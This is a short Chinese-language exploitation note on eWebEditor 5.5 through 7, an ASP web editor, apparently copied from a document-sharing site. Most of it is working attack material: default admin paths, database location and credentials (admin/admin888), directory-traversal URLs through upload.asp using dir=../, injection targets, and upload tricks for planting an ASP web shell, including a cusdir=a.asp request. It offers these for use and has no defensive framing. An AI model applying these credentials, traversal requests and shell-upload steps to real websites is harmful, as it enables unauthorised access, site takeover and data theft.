Ewebeditor 5.5 列目录漏洞利用方法

Ewebeditor 5.5 列目录漏洞利用方法2011-08-01 22:48默认登陆admin_login.asp
默认数据库db/ewebeditor.mdb
默认帐号admin 密码admin或admin888
ewebeditor2007/admin_style.asp?action=stylepreview&id=37

后台登录
ewebeditor5.5 默认后台/admin/ewebeditor/admin/login.asp 默认密码admin
添加上传类型asp,调用用样式上传页ewebeditor/ewebeditor.htm?

id=body&style=popup直接上传asp大马。


遍厉网站
ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../一级跳转目录
ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../../二级跳转目录
可遍厉网站所有目录文件。


注入 编辑器ewebedior7以前版本通通存在注入
直接检测不行的,要写入特征字符 表sys_username 密码sys_userpass
ewebeditor2007/ewebeditor.asp?id=article_content&style=full_v200

利用upload.asp文件,本地构造上传shell






ewebeditor 5.5 - 6.0
ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
网站目录下生产 a.asp这个文件 然后再本地构造html





相关文档
最新文档